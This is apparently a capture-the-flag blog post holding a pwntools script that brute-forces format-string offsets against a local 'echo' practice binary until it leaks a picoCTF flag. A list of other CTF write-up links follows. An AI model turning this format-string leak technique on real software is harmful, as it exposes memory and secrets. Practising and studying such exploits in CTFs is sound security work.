exploit.py
from pwn import *
p = process("./echo")
for i in range(1,100):
try:
p = process("./echo")
payload ="%"+str(i)+"$s"
p.sendlineafter("> ",payload)
result = p.recv(2048)
if "picoCTF" in result:
print result
break
p.close()
except:
print "fail"
p.close()
'System > Pwnable Practice' 카테고리의 다른 글
Plaid CTF 2015 ebp (0) | 2019.08.06 |
---|---|
Layer7 CTF 2018 Life Game (0) | 2019.08.05 |
Layer7 CTF 2018 Talmoru_party!~ (0) | 2019.08.02 |
Defcon CTF 2019 Speedrun 1,2 (0) | 2019.08.01 |
Harekaze CTF 2019 Baby ROP 1,2 (0) | 2019.08.01 |